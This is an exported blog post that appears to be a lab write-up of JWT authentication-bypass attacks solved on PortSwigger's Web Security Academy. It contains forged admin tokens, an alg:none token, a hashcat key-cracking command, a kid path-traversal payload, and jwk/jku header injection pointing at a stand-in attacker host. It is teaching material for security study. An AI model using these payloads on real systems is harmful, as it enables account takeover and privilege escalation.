{"id":1448,"date":"2024-03-01T21:07:00","date_gmt":"2024-03-01T13:07:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1448"},"modified":"2025-06-09T14:03:19","modified_gmt":"2025-06-09T06:03:19","slug":"jwt-attack","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1448","title":{"rendered":"JWT Attack"},"content":{"rendered":"\n<p>JWT attacks aim to bypass a website's authentication: the attacker sends the site a modified JWT in order to impersonate another user. If an attacker can create a valid JWT of their own with arbitrary claim values, they can escalate their privileges or impersonate other users and take full control of their accounts.<\/p>\n\n<p>Common JWT attack techniques include:<\/p>\n\n<ul class=\"wp-block-list\">\n<li>Signature not verified<\/li>\n<li>Unsigned JWT<\/li>\n<li>Brute-forcing a symmetric signing key<\/li>\n<li>Bypassing symmetric signing via the kid header<\/li>\n<li>Bypassing asymmetric signing via the jwk header<\/li>\n<li>Bypassing asymmetric signing via the jku header<\/li>\n<\/ul>\n\n<p>ps:<br>For an introduction to JWT, see <a href=\"https:\/\/systw.net\/note\/archives\/1452\">JWT<\/a><\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">Signature not verified<\/h2>\n\n<p>The website does not verify the JWT signature, so an attacker can change the JWT's contents arbitrarily.<\/p>\n\n<p>For example, when the admin page is requested, the response says that only the administrator account may use it:<\/p>\n\n<pre class=\"wp-block-code\"><code>################ request ################ \nGET \/admin HTTP\/1.1\nHost: 0a36001b04ccef7bc0a7741d006c0066.web-security-academy.net\nCookie:session=eyJraWQiOiI0ZjY1MzkzNC0yMTM3LTQzNGItYjE0OC0yNzg4Y2Y0OGRlMWYiLCJhbGciOiJSUzI1NiJ9.<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NjU3ODQxNH0<\/mark>.Hp6sPpaIOCVwA34Eb2-h_pU2r6dUH_ZptjPt07uvKcF6z7PGUKWTV6ZQqXMoArudgF2E0WyAP0BYzoYZ1M4WVu4tUY3v_1Tnbf7-H_EqIDihcQ6KuxNaXNNPZw22GGvVgUdCsy3XgfZFH_LY5raFPpjavJ5aAOcqXG58zQlFYWcU5Kye2xB5AczvbDEDnpvQk00ygPBPSnXbV4JIk1jRJDM1suI5LN_tKn7LD_oBOwRGaJtreNekpV-8NXqbxzfjgVqAmHhQz6ZDxV-5LmiHT9yXVX7PdsUt5xhfrZYkTd_s8n6s0RvHvR1gwueVCplJqecZRRCkaAzwF9O1M9GwPw\nCache-Control: max-age=0\n...omit...\n\n################ response ################ \n...omit... only allow administrator ...omit...<\/code><\/pre>\n\n<p>Using JWT Editor, you can see that the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NjU3ODQxNH0<\/mark> part of the token decodes to the following<\/p>\n\n<pre class=\"wp-block-code\"><code>{\n    \"iss\": \"portswigger\",\n    \"sub\": \"wiener\",\n    \"exp\": 1656578414\n}<\/code><\/pre>\n\n<p>Use JWT Editor to change the content above to administrator<\/p>\n\n<pre class=\"wp-block-code\"><code>{\n    \"iss\": \"portswigger\",\n    \"sub\": \"administrator\",\n    \"exp\": 1656578414\n}<\/code><\/pre>\n\n<p>This part of the token then becomes <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1Nzg0MTR9<\/mark><\/p>\n\n<p>Send the request with the edited token; the admin interface is now accessible<\/p>\n\n<pre class=\"wp-block-code\"><code>################ request ################ \nGET \/admin HTTP\/1.1\nHost: 0a36001b04ccef7bc0a7741d006c0066.web-security-academy.net\nCookie: session=eyJraWQiOiI0ZjY1MzkzNC0yMTM3LTQzNGItYjE0OC0yNzg4Y2Y0OGRlMWYiLCJhbGciOiJSUzI1NiJ9.<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1Nzg0MTR9<\/mark>.Hp6sPpaIOCVwA34Eb2-h_pU2r6dUH_ZptjPt07uvKcF6z7PGUKWTV6ZQqXMoArudgF2E0WyAP0BYzoYZ1M4WVu4tUY3v_1Tnbf7-H_EqIDihcQ6KuxNaXNNPZw22GGvVgUdCsy3XgfZFH_LY5raFPpjavJ5aAOcqXG58zQlFYWcU5Kye2xB5AczvbDEDnpvQk00ygPBPSnXbV4JIk1jRJDM1suI5LN_tKn7LD_oBOwRGaJtreNekpV-8NXqbxzfjgVqAmHhQz6ZDxV-5LmiHT9yXVX7PdsUt5xhfrZYkTd_s8n6s0RvHvR1gwueVCplJqecZRRCkaAzwF9O1M9GwPw\nCache-Control: max-age=0\n...omit...\n\n################ response ################ \n...omit...\n&lt;section&gt;\n&lt;p&gt;User deleted successfully!&lt;\/p&gt;\n\t&lt;h1&gt;Users&lt;\/h1&gt;\n\t&lt;div&gt;\n\t&lt;span&gt;wiener - &lt;\/span&gt;\n\t&lt;a href=\"\/admin\/delete?username=wiener\"&gt;Delete&lt;\/a&gt;\n...omit...<\/code><\/pre>\n\n<p>Lab: JWT authentication bypass via unverified signature<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">Unsigned JWT<\/h2>\n\n<p>The website accepts JWTs that carry no signature, so alg can be changed to none; once the JWT has no signing mechanism, its contents can be modified at will.<\/p>\n\n<p>For example, to access \/my-account as administrator, the token is again changed to administrator with JWT Editor. But because the target site specifies an alg, any change to the contents no longer matches the signature, so the modified JWT is rejected.<\/p>\n\n<p>Since the site accepts unsigned JWTs, simply changing alg to none removes the signature, as follows<\/p>\n\n<pre class=\"wp-block-code\"><code>############## header ##############\n{\n    \"kid\": \"4d65bce9-4436-44cf-8475-a297719c5281\",\n    \"alg\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">none<\/mark>\"\n}\n\n############## payload ##############\n{\n    \"iss\": \"portswigger\",\n    \"sub\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">administrator<\/mark>\",\n    \"exp\": 1656580618\n}<\/code><\/pre>\n\n<p>After regenerating the token, the signature segment is gone (the token ends with a trailing dot); sending this request gives access to \/my-account as administrator<\/p>\n\n<pre class=\"wp-block-code\"><code>GET \/my-account HTTP\/1.1\nHost: 0ab7006c03314ce7c0c42f88006d0081.web-security-academy.net\nCookie: session=eyJraWQiOiI0ZDY1YmNlOS00NDM2LTQ0Y2YtODQ3NS1hMjk3NzE5YzUyODEiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1ODA2MTh9.<\/code><\/pre>\n\n<p>Lab: JWT authentication bypass via flawed signature verification<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">Brute-forcing a symmetric signing key<\/h2>\n\n<p>Some signing algorithms, such as HS256 (HMAC+SHA-256), accept an arbitrary string as the key, so the key can be recovered by brute-force password cracking and then used to re-sign the token.<\/p>\n\n<p>For example, below is the JWT used when visiting the site; administrator identity is required, and the token is signed with HS256<\/p>\n\n<pre class=\"wp-block-code\"><code>################ request ################\nGET \/admin HTTP\/1.1\nHost: 0aff00980379e949c0ec224a00f90071.web-security-academy.net\nCookie: session=eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE\n...omit...\n\n################ response ################ \n...omit...Admin interface only available if logged in as an administrator...omit...<\/code><\/pre>\n\n<p>So simply changing the subject to administrator does nothing; the secret key used for signing must be obtained first, and the modified content re-signed with it. The steps are as follows<\/p>\n\n<h3 class=\"wp-block-heading\">step1. Find the secret key<\/h3>\n\n<p>First prepare a wordlist file jwt.secrets.list; for its contents see <a href=\"https:\/\/github.com\/wallarm\/jwt-secrets\/blob\/master\/jwt.secrets.list\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/wallarm\/jwt-secrets\/blob\/master\/jwt.secrets.list<\/a><\/p>\n\n<p>Then use hashcat to try to brute-force the current token<\/p>\n\n<pre class=\"wp-block-code\"><code>hashcat -a 0 -m 16500 eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE jwt.secrets.list<\/code><\/pre>\n\n<p>Cracking reveals that the secret key is secret1<\/p>\n\n<h3 class=\"wp-block-heading\">step2. Generate a JWT key<\/h3>\n\n<p>In <code>JWT editor keys<\/code>, choose <code>new symmetric key<\/code> and press <code>generate<\/code>; the following is produced<\/p>\n\n<pre class=\"wp-block-code\"><code>{\n    \"kty\": \"oct\",\n    \"kid\": \"6e45657d-202e-4e74-a50d-0c8f785dc1cf\",\n    \"k\": \"qzlgHvHrjWoqNS_9Jd_1EQ\"\n}<\/code><\/pre>\n\n<p>Base64-encode the secret key just recovered to get c2VjcmV0MQ==, then paste it in as follows<\/p>\n\n<pre class=\"wp-block-code\"><code>{\n    \"kty\": \"oct\",\n    \"kid\": \"6e45657d-202e-4e74-a50d-0c8f785dc1cf\",\n    \"k\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">c2VjcmV0MQ==<\/mark>\"\n}<\/code><\/pre>\n\n<h3 class=\"wp-block-heading\">step3. Re-sign the modified content<\/h3>\n\n<p>In <code>JWT editor<\/code>, change the original token content to administrator as follows<\/p>\n\n<pre class=\"wp-block-code\"><code>{\n    \"iss\": \"portswigger\",\n    \"sub\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">administrator<\/mark>\",\n    \"exp\": 1657606804\n}<\/code><\/pre>\n\n<p>Then click <code>sign<\/code> in <code>JWT editor<\/code> and choose the following settings<\/p>\n\n<ul class=\"wp-block-list\">\n<li><code>signing key<\/code>: the key you generated in JWT editor keys<\/li>\n<li><code>signing algorithm<\/code>: HS256<\/li>\n<li><code>header options<\/code>: don&#8217;t modify header<\/li>\n<\/ul>\n\n<p>A signature matching the modified token content is generated; with this new token the admin function can be accessed as administrator<\/p>\n\n<p>Lab: JWT authentication bypass via weak signing key<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">Bypassing symmetric signing via the kid header<\/h2>\n\n<p>Developers may use the kid parameter to point to a specific database entry or to a file name. If this parameter is also vulnerable to directory traversal, an attacker may be able to force the server to use an arbitrary file from its file system as the verification key.<\/p>\n\n<p>For example, the target site verifies signatures by using the kid parameter in the JWT header to fetch the corresponding key from its file system, so an attacker can use kid to sign the token themselves<\/p>\n\n<h3 class=\"wp-block-heading\">step1. Generate a JWT key<\/h3>\n\n<p>In <code>JWT editor keys<\/code>, choose <code>new symmetric key<\/code> and press <code>generate<\/code> to produce the following (there is no need to choose a <code>key size<\/code>, since it updates automatically)<\/p>\n\n<p>Then replace the value of k with a base64-encoded <code>null byte<\/code>, i.e. AA==, as below. Then press <code>OK<\/code> to save<\/p>\n\n<pre class=\"wp-block-code\"><code>{\n    \"kty\": \"oct\",\n    \"kid\": \"41fc55b2-df7b-4063-9e7e-7f986a9f5fd9\",\n    <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">\"k\": \"AA==\"<\/mark>\n}<\/code><\/pre>\n\n<h3 class=\"wp-block-heading\">step2. Re-sign with the null byte<\/h3>\n\n<p>In <code>JWT editor<\/code>, modify the original token content<\/p>\n\n<p>kid must point to a file that returns a null byte, for example \/dev\/null. Because the site has a directory traversal vulnerability, the path <code>..\/..\/..\/..\/..\/..\/..\/dev\/null<\/code> is used to obtain the null byte<\/p>\n\n<p>Change sub to administrator, as follows<\/p>\n\n<pre class=\"wp-block-code\"><code>############## header ##############\n\n{\n    <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">\"kid\": \"..\/..\/..\/..\/..\/..\/..\/dev\/null\",<\/mark>\n    \"alg\": \"HS256\"\n}\n\n############## payload ############## \n\n{\n    \"iss\": \"portswigger\",\n    \"sub\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">administrator<\/mark>\",\n    \"exp\": 1658303137\n}\n<\/code><\/pre>\n\n<p>Then click <code>sign<\/code> in <code>JWT editor<\/code>, choose the symmetric key just created, make sure the <code>Don't modify header<\/code> option is checked, and press <code>OK<\/code><\/p>\n\n<p>The token has now been re-signed with the null byte as the key; with this new token the site can be accessed as administrator<\/p>\n\n<p>Lab: JWT authentication bypass via kid header path traversal<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">Bypassing asymmetric signing via the jwk header<\/h2>\n\n<p>Normally, a site that uses RSA signatures verifies JWT signatures only with its designated public key, but if it is misconfigured it may accept an embedded JWK (JSON Web Key). This means the user can tell the site which key to use when verifying the signature, and then sign with any key of their own. In other words, one can sign with one's own RSA private key and place the matching RSA public key in the jwk header.<\/p>\n\n<p>For example, the target site signs with RSA; to sign with your own RSA private key instead, the steps are as follows<\/p>\n\n<h3 class=\"wp-block-heading\">step1. Generate your own RSA key pair<\/h3>\n\n<p>Go to <code>JWT Editor Keys<\/code>, choose <code>New RSA Key<\/code>, press <code>Generate<\/code> to create a new key pair, and press <code>Ok<\/code> to save the RSA key (there is no need to choose a <code>key size<\/code>, since it updates automatically)<\/p>\n\n<h3 class=\"wp-block-heading\">step2. Modify the token content<\/h3>\n\n<p>Then go back to <code>JWT editor<\/code> and change your token to administrator as follows<\/p>\n\n<pre class=\"wp-block-code\"><code>########### header ##############\n\n{\n    \"kid\": \"cbb889d1-dc30-407a-b67d-1034114d1221\",\n    \"alg\": \"RS256\"\n}\n\n########### payload ##############\n\n{\n    \"iss\": \"portswigger\",\n    \"sub\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">administrator<\/mark>\",\n    \"exp\": 1659080691\n}\n<\/code><\/pre>\n\n<h3 class=\"wp-block-heading\">step3. Sign with your own RSA key pair<\/h3>\n\n<p>At the bottom of <code>JWT editor<\/code> press <code>attack<\/code>, choose <code>Embedded JWK<\/code>, select the RSA key just generated and press <code>OK<\/code>; the header then changes, for example as follows<\/p>\n\n<pre class=\"wp-block-code\"><code>########### header ##############\n{\n    \"kid\": \"477b1bbd-18ab-4774-b77c-989bf6037760\",\n    \"typ\": \"JWT\",\n    \"alg\": \"RS256\",\n    \"jwk\": {\n        \"kty\": \"RSA\",\n        \"e\": \"AQAB\",\n        \"kid\": \"477b1bbd-18ab-4774-b77c-989bf6037760\",\n        \"n\": \"jcep6jQV7CL_IUPGW1N4hZKjTmwTQc1V-o1zocuMliJ0NqPMzvmoglXPzraUbeiHUxOWM-JBRvTeuFOBQBi717vJD4Bf-5G248MDZXy8d94kRaFZzid9fLD2rDwJBFhNeFyulBIXpCpooTODNdXrs2eIlPwJL3f-TXOfy7uUftalRS4WPTUs-5NhhMqMBSr9LOyanpnScoNfi6wo2mzW-_K1ze45UHIBzb92kBnM0KOeMib027oRmcielyglL5yYbUrwabKqEvwm2EpI2fyPq9XwydkDABTnmrCtXf8oKpyQX_kYsWmGXa1SoSl-L7LRXqW64MNhAD4uBD7S4MZvGw\"\n    }\n}<\/code><\/pre>\n\n<p>The new token is now treated as administrator when accessing admin<\/p>\n\n<p>Lab: JWT authentication bypass via jwk header injection<\/p>\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n<h2 class=\"wp-block-heading\">Bypassing asymmetric signing via the jku header<\/h2>\n\n<p>Sites that sign JWTs with RSA sometimes support the jku (JWK Set URL) header parameter to reference the JWK set holding the keys; when verifying a JWT signature, the site fetches the key from the specified URL. If the site does not check whether that URL belongs to a trusted host before fetching the key, an attacker can exploit this to sign with any key of their own. The steps are as follows<\/p>\n\n<h3 class=\"wp-block-heading\">step1. Generate your own RSA key pair<\/h3>\n\n<p>Go to <code>JWT Editor Keys<\/code>, choose <code>New RSA Key<\/code>, press <code>Generate<\/code> to create a new key pair, and press <code>Ok<\/code> to save the RSA key (there is no need to choose a <code>key size<\/code>, since it updates automatically)<\/p>\n\n<h3 class=\"wp-block-heading\">step2. Host the public key on the attacker host<\/h3>\n\n<p>Then click the key just generated, choose <code>Copy Public Key as JWK<\/code>, and paste it on the attacker host ( https:\/\/attackhost\/exploit ), as follows<\/p>\n\n<pre class=\"wp-block-code\"><code>{\n    \"keys\": &#91;\n        {\n            \"kty\": \"RSA\",\n            \"e\": \"AQAB\",\n            \"kid\": \"492b828a-556c-4cdd-b1f3-513c2d7bf28c\",\n            \"n\": \"yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw\"\n        }\n    ]\n}<\/code><\/pre>\n\n<h3 class=\"wp-block-heading\">step3. Re-sign using JKU<\/h3>\n\n<p>In <code>JWT editor<\/code>, modify the token header: replace kid with the kid of the newly created key and set jku to the attacker URL, as follows<\/p>\n\n<pre class=\"wp-block-code\"><code>{\n\t\"kid\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">492b828a-556c-4cdd-b1f3-513c2d7bf28c<\/mark>\",\n\t\"alg\": \"RS256\",\n\t\"jku\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">https:\/\/attackhost\/exploit<\/mark>\"\n}<\/code><\/pre>\n\n<p>In the payload, change sub to administrator.<\/p>\n\n<p>Then press <code>sign<\/code> at the bottom, choose the RSA key just generated, make sure the <code>Don't modify header<\/code> option is checked, and press <code>OK<\/code><\/p>\n\n<p>The token is now re-signed; using it is equivalent to accessing the site as administrator.<\/p>\n\n<p>Lab: JWT authentication bypass via jku header injection<\/p>\n","protected":false},"excerpt":{"rendered":"<p>JWT attacks aim to bypass a website's authentication: the attacker sends the site a modified JWT in order to impersonate another user. If an attacker can create a valid JWT of their own with arbitrary claim values, they can escalate their privileges or impersonate other users and take full control of their accounts.<\/p>\n","protected":false},"author":1,"featured_media":2390,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/i.imgur.com\/H5ay8Hy.jpg","fifu_image_alt":"jwt 
attack","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1448","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/i.imgur.com\/H5ay8Hy.jpg?fit=161%2C81&ssl=1","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1448","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1448"}],"version-history":[{"count":1,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1448\/revisions"}],"predecessor-version":[{"id":2389,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1448\/revisions\/2389"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media\/2390"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1448"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1448"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}